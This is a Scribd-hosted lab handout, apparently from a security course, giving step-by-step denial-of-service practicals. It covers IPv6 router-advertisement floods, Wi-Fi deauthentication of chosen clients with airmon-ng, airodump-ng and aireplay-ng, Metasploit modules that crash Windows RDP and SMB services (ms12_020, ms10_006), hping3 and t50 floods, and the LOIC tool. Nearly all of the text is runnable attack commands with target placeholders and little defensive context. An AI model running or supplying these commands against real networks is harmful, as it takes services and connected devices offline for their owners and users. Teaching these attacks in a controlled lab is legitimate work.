0% found this document useful (0 votes)
7 views

009dos Lab

Uploaded by

MAJID ABDULLAH
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
7 views

009dos Lab

Uploaded by

MAJID ABDULLAH
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

Practical No 1: Dossing the network using ipv6 floods

Step 1: open a blank terminal and type ifconfig to find out your interface name

Step 2: execute the following command to start flooding

For kali 2.0 below:

flood_router6 eth0

For kali 2.0 onwards:

atk6-flood_router6 eth0

Chinni Diwakar 1
Meanwhile for the effected victim when he types ifconfig or ipconfig he will see output like this

Chinni Diwakar 2
Practical No 2: Dossing the wifi network using aireplay deauth packets

Requirements Kali linux latest version (not virtualbox kali) and wifi connection

Step 1: open a blank terminal and type iwconfig to find out your wifi interface name

Probably it would be wlan0 like that.

Chinni Diwakar 3
Step 2: enabling monitor mode, execute the following code

airmon-ng start <wifi interfacename>

airmon-ng start wlan0

Chinni Diwakar 4
this will turn your wifi interface name into wlan0mon like name

Step 3: looking for target APs

airodump-ng wlan0mon

this will show you the available wifi networks around you please note down the BSSID (MAC) and
channel and essid.

Step 4: looking for target clients

airodump-ng --bssid <TARGET AP MAC> --channel <channel no of target> <wifi monitormode interface>

airodump-ng --bssid 1a:1a:1b:54:ed:8c --channel 7 wlan0mon

from the above command you will get output like station mac note down those mac addresses to dos on
them

Chinni Diwakar 5
Step 5: Dossing on station macs

aireplay-ng -0 0 –a <target AP mac> -c <target client or station MAC> <wifi monitormode interface>

you can see the difference in the wifi devices connection.

Chinni Diwakar 6
Practical No 3: RDP dos on windows 7 and server 2008 machines using msfconsole

Step 1: service postgresql start

Step 2: msfconsole

Step 3: search ms12_020

Step 4: use <exploit code>

Step 5: show options

Step 5: set RHOST <target ip>

Step 6: run

You can see the vulnerable target having a bluescreen of death.

Chinni Diwakar 7
Practical No 4: SMB dos on windows machines using msfconsole

Step 1: service postgresql start

Step 2: msfconsole

Step 3: search ms10_006

Or search negotiate_response

Step 4: use <exploit code>

Step 5: show options

Step 6: set SRVHOST <Attacker IP>

Chinni Diwakar 8
Step 7: show options

Step 8: run

Give \\AttackerIP\Shared\Anything link to victim he will be frozen.

Chinni Diwakar 9
Ex: \\192.168.0.100\Shared\Anything

Practical No 5: Using Hping3 to flood on target

hping3 <TARGET IP> --flood

Practical No 6: Using t50 to flood on target

t50 <TARGET IP> --flood

You can see the attack impacts of the above attacks in the below images,

Before Attack

During Attack

Chinni Diwakar 10
After Stopping Attack

Chinni Diwakar 11
Chinni Diwakar 12
Practical No 7: Using LOIC Tool to Attack on Target

After clicking on IMMA CHARGIN MAH LAZER you can see the following picture of flooding

Click on stop flooding to stop attack.

Chinni Diwakar 13

You might also like